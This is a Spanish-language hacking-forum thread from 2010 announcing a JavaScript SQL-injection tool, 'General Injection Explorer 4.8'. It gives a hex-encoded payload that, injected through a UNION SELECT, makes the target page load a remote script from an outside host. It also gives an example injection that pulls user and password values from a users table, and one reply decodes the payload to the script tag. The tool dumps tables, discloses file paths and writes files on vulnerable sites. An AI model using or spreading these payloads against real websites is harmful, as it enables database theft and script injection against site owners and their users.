Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Pony-Magic en 13 Diciembre 2010, 09:26 am


Título: GiE 4.8 - SQLi
Publicado por: Pony-Magic en 13 Diciembre 2010, 09:26 am
General Injection Explorer 4.8
version anterior. (http://foro.elhacker.net/nivel_web/gie_47_mysqli-t287792.0.html)

  • ajax peticiones con async
  • dumpea tablas en <table> y .SQL
  • full path disclosure
  • write file
(http://img703.imageshack.us/img703/1184/screensl.png)

Paste2 Codigo de fuente. (http://paste2.org/p/1137500)
Archivo Gie.JS (http://kryptosecurity.com.ar/gie.js)

Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

-> usar ((0xCode)) en vez de (0xCode)



@name: General Injection Explorer
@version: 4.8
@author: PonyMagic
@date: 12/12/2010 - 2:51
@contact: PonyMagic@live.com


PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]

Título: Re: GiE 4.8 - SQLi
Publicado por: Darioxhcx en 13 Diciembre 2010, 17:31 pm
saaaaabeeeeeeeeeeeeeeeeeeeeee

Título: Re: GiE 4.8 - SQLi
Publicado por: Karcrack en 17 Diciembre 2010, 11:23 am
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?

Título: Re: GiE 4.8 - SQLi
Publicado por: Pony-Magic en 17 Diciembre 2010, 12:52 pm
Cita de: Karcrack en 17 Diciembre 2010, 11:23 am
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?


cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.


Título: Re: GiE 4.8 - SQLi
Publicado por: xassiz~ en 17 Diciembre 2010, 14:37 pm
Cita de: Karcrack en 17 Diciembre 2010, 11:23 am
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
Código
  1. <script src='http://kryptosecurity.com.ar/gie.js'/>


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines